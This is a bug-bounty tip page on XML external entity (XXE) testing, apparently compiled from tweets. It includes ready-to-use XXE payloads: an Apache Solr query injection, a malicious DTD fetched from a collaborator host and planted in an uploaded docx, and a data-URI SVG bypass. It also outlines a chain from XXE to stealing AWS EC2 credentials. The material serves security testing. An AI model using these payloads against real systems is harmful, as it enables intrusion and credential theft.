Book of BugBounty Tips

Powered by GitBook

On this page

XXE

PreviousInjection NextLocal / Remote File Inclusion

Last updated 4 years ago

change password func -> JSON

converted to XML -> 200 OK

created dtd file on my ec2 and started webserver on port 80

crafted a XXE payload!

Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change the content-type.

see an apache solr GET/POST to /select ? Set the 'q' parameter to the following for an XXE injection: /select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'} - https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html… #BugBounty

#bugbountytip Company fixed an XXE by blocking arbitrary URL(s) to grab an SVG? Try & bypass it by embedding the SVG using the Data URI protocol handler [data:image/svg+xml;base64,XXE_PAYLOAD], most of the time it would work! #BugBounty #TogetherWeHitHarder #infosec #infosecurity

https://twitter.com/11xuxx/status/1250764273623629826

XXE by injecting METADATA in Image bytes --> Blind SSRF via local dtd --> grabbed AWS EC2 credentials blindly --> Powned #bugbountytips #bugbountytip

jobs.targ.com site fills in personal info by uploading cv & parsing. Accepted docx, pdf, etc. 1. Unzip docx & edit word/document.xml 3. Add <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://burp.collab.net/mal.dtd"> %xxe;]> 3. Upload 4. Profit! #BugBounty

#BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on@Burp_Suite to do achieve this!